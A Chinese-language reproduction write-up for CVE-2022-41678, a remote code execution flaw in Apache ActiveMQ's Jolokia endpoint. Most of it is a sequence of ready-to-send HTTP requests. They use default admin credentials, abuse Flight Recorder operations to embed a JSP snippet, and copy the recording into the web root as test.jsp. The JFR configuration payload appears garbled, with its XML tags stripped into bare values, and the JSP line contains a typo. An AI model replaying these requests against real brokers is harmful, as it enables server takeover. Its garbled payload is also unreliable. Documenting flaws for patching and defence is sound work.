## Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678 ## 影响范围 ``` Apache ActiveMQ before 5.16.6 Apache ActiveMQ 5.17.0 before 5.17.4 Apache ActiveMQ 5.18.0 unaffected Apache ActiveMQ 6.0.0 unaffected ``` ## 漏洞复现版本下载 ``` https://activemq.apache.org/activemq-5017000-release ``` ## 漏洞复现 #### 新建记录 ``` POST /api/jolokia/ HTTP/1.1 Host: localhost:8161 Origin:localhost:8161 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Content-Type: application/json Content-Length: 136 { "type": "EXEC", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "newRecording", "arguments": [] } ``` 记住这个 `value`参数中的值，后面的poc要用到,例如现在是4 ![](./assets/20231130233131.png) #### 写入payload ``` POST /api/jolokia/ HTTP/1.1 Host: localhost:8161 Origin:localhost:8161 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Content-Type: application/json Content-Length: 136 { "type": "EXEC", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "setConfiguration", "arguments": [4," true everyChunk <%out.printIn("success");%> true 1000 ms true everyChunk true 1000 ms true true true true true 10 ms true true 10 ms true true 10 ms true true 10 ms true true 10 ms true true 0 ms true true 0 ms true true 0 ms true true false true 0 ms false true false true beginChunk true beginChunk true 10 ms true 20 ms true 0 ms false 0 ms false 0 ms false 0 ms false 0 ms false 0 ms true 0 ms true true true 60 s true beginChunk true beginChunk true beginChunk true beginChunk true beginChunk true beginChunk true beginChunk true true true true true true true false everyChunk true everyChunk true beginChunk true beginChunk true beginChunk true beginChunk false true true true true true true true true true true true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms true 0 ms false 0 ms false 0 ms true 0 ms true true true true true true true true true true true true false true true false everyChunk false true true 0 ns true beginChunk true 1000 ms true 100 ms true 10 s true false true beginChunk true everyChunk true 100 ms true beginChunk true everyChunk true true beginChunk true beginChunk true 10 s true 1000 ms true 10 s true beginChunk true endChunk true 5 s true beginChunk true everyChunk true true true true true everyChunk true true 10 ms true true 10 ms true true 10 ms true true 10 ms true true 10 ms false true true true true 1000 ms true true true true true 10 ms true 0 ms 10 ms true true 10 ms false true 0 ms false true 0 ms false true 0 ms 10 ms 10 ms 10 ms false "] } ``` ![](./assets/20231130233450.png) ### 导出录制到web目录 ``` POST /api/jolokia/ HTTP/1.1 Host: localhost:8161 Origin:localhost:8161 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Content-Type: application/json Content-Length: 141 { "type": "EXEC", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "startRecording", "arguments": [4] } ``` ![](./assets/20231130233542.png) ``` POST /api/jolokia/ HTTP/1.1 Host: localhost:8161 Origin:localhost:8161 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Content-Type: application/json Content-Length: 138 { "type": "EXEC", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "stopRecording", "arguments": [4] } ``` ![](./assets/20231130233602.png) #### 导出到web目录 ``` POST /api/jolokia/ HTTP/1.1 Host: localhost:8161 Origin:localhost:8161 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Content-Type: application/json Content-Length: 159 { "type": "EXEC", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "copyTo", "arguments": [4,"../../webapps/test.jsp"] } ``` ![](./assets/20231130233747.png) #### test.jsp写入成功 ![](./assets/20231130233759.png) ![](./assets/20231130233835.png) ## 漏洞来源 - https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/ ## payload 本地搭建源码，环境配置不正确，无法调试代码，payload是搜索GitHub关键字找到的 - https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4